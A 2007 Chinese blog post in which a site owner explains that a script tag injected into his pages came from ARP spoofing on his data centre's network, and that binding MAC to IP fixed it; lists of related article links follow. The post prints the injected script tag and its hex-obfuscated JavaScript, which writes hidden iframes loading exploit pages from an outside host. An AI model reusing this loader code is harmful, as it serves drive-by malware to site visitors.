网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
把textarea中字符串里含有的回车换行替换成&amp;lt;br&amp;gt;的javascript代码
Apr 20 Javascript
JavaScript 高级篇之函数 (四)
Apr 07 Javascript
基于jquery的禁用右键、文本选择功能、复制按键的实现代码
Aug 27 Javascript
javascript获取url上某个参数的方法
Nov 08 Javascript
javascript window.open打开新窗口后无法再次打开该窗口问题的解决方法
Apr 12 Javascript
readonly和disabled属性的区别
Jul 26 Javascript
javascript中对变量类型的判断方法
Aug 09 Javascript
javascript封装简单实现方法
Aug 11 Javascript
解决在Bootstrap模糊框中使用WebUploader的问题
Mar 22 Javascript
基于jQuery实现的设置文本区域的光标位置
Jun 15 jQuery
vue实现的网易云音乐在线播放和下载功能案例
Feb 18 Javascript
vue-cli 关闭热更新操作
Sep 18 Javascript
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
PHP4实际应用经验篇(3)
2006/10/09 PHP
swfupload 多文件上传实现代码
2008/08/27 PHP
CI(CodeIgniter)框架介绍
2014/06/09 PHP
php+mysqli使用面向对象方式更新数据库实例
2015/01/29 PHP
php文件操作小结(删除指定文件/获取文件夹下的文件名/读取文件夹下图片名)
2016/05/09 PHP
php把时间戳转换成多少时间之前函数的实例
2016/11/16 PHP
js中运算符&amp;&amp; 和 || 的使用记录
2014/08/21 Javascript
js实现带缓冲效果的仿QQ面板折叠菜单代码
2015/09/06 Javascript
AngularJs bootstrap搭载前台框架——js控制部分
2016/09/01 Javascript
学习vue.js表单控件绑定操作
2016/12/05 Javascript
微信小程序之GET请求的实例详解
2017/09/29 Javascript
微信小程序实现换肤功能
2018/03/14 Javascript
解决eclipse中没有js代码提示的问题
2018/10/10 Javascript
微信小程序tabBar 返回tabBar不刷新页面
2019/07/25 Javascript
Vue仿Bibibili首页的问题
2021/01/21 Vue.js
python 将字符串转换成字典dict
2013/03/24 Python
Python基本数据类型详细介绍
2014/03/11 Python
Python用threading实现多线程详解
2017/02/03 Python
python操作MySQL 模拟简单银行转账操作
2017/09/27 Python
Flask框架使用DBUtils模块连接数据库操作示例
2018/07/20 Python
使用python进行波形及频谱绘制的方法
2019/06/17 Python
Django REST framework 单元测试实例解析
2019/11/07 Python
Python hashlib加密模块常用方法解析
2019/12/18 Python
如何学习Python time模块
2020/06/03 Python
python实现ping命令小程序
2020/12/28 Python
用HTML5制作视频拼图的教程
2015/05/13 HTML / CSS
ZWILLING双立人英国网上商店:德国刀具锅具厨具品牌
2018/05/15 全球购物
最新大学毕业求职简历的自我评价
2013/10/18 职场文书
初中校园广播稿
2014/02/02 职场文书
《鞋匠的儿子》教学反思
2014/03/02 职场文书
护理人员的自我评价分享
2014/03/15 职场文书
党校毕业个人总结
2015/02/28 职场文书
小学科学课教学反思
2016/02/23 职场文书
“爱眼护眼,提前预防近视”倡议书3篇
2019/10/30 职场文书
CSS变量实现主题切换的方法
2021/06/23 HTML / CSS
Java8利用Stream对列表进行去除重复的方法详解
2022/04/14 Java/Android